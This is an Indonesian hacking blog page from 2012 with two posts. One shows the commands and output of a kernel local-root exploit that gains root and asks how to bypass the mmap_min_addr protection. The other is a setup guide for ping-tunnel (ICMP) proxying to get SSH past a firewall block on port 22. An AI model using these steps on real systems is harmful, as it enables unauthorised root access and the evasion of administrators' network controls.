This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Sabtu, 15 September 2012

mmap: Permission denied

Harusnya bisa di root explot,, tetapi gak bisa karena:
mmap: Permission denied
because "Mmap_min_addr" not 0
evry one have how to bypass "Mmap_min_addr" and write on 0 "Zero"


semple exemple:
-------------------------------------------------------------
cat /proc/sys/vm/mmap_min_addr
0
gcc -o gayros local-root-exploit-gayros.c
./gayros
we got null page babe!
Using kernel version 2.6.30.8-64.fc11.i586.
Found version 3 structure, doing our tricks in memory...
Go go go boy!
.we've got bush!
# whoami
root
+++++++++++++++
sudo sysctl -w vm.mmap_min_addr=65536
cat /proc/sys/vm/mmap_min_addr
65536
./gayros
mmap: Permission denied
-----------------------------------
SO,whats methods to bypass it

Minggu, 02 September 2012

ptunnel proxy

pada prinsipnya ptunnel a.k.a ping tunnel proxy sama seperti ssh tunnel. kenapa??
ya karena ptunnel itu juga menggunakan ssh proxy, hanya saja ptunnel memanfaatkan icmp paket untuk koneksi ssh.
hal ini memungkinkan untuk kita membuat proxy tunnel jika koneksi ssh port (port 22) di block oleh admin.


syarat:
  • anda harus mempunyai ssh server / root shell untuk menjalankan ptunnel server (wajib)
  • download ptunnel disini .(server & client)
 cara installasi:
  • dependency: libpcap & libpcap-devel (linux) , winpcap (windows)
root@ptunelserver [~/PingTunnel]# yum install libpcap-devel
root@ptunnelserver [~/PingTunnel]# make
gcc -Wall -g `[ -e /usr/include/selinux/selinux.h ] && echo -DHAVE_SELINUX` -c -o ptunnel.o ptunnel.c
gcc -Wall -g `[ -e /usr/include/selinux/selinux.h ] && echo -DHAVE_SELINUX` -c -o md5.o md5.c
gcc -o ptunnel ptunnel.o md5.o -lpthread -lpcap `[ -e /usr/include/selinux/selinux.h ] && echo -lselinux`
root@ptunnelserver [~/PingTunnel]# ls -al ptunnel
-rwxr-xr-x 1 root root 70810 Sep  2 07:30 ptunnel*
root@ptunnelserver [~/PingTunnel]#

cara menjalankan:
server (linux) -- standart running:
./ptunnel &

client (windows)
ptunnel.exe -p ptunnelserver.example.net -lp 8000 -da 127.0.0.1 -dp 22
lalu jalankan putty or ssh ke port 8000 localhost
ssh -p 1080 127.0.0.1
setelah login
jalankan tunnel di putty tsb.
pasang proxy di browser anda sesuai port tunnel di putty
---
 sekian.

reff:
http://www.cs.uit.no/~daniels/PingTunnel/index.html
http://psung.blogspot.com/2008/05/breaking-through-firewalls-with-ping.html